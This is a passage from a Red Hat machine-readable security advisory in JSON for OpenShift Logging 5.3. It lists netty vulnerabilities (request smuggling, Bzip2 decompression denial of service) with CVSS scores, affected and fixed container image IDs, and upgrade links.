"details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty: Request smuggling via content-length header"
},
{
"cve": "CVE-2021-37136",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004133"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. By sending a specially-crafted input, a remote attacker could cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37136"
},
{
"category": "external",
"summary": "RHBZ#2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T19:37:00+00:00",
"details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data"
},
{
"cve": "CVE-2021-37137",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
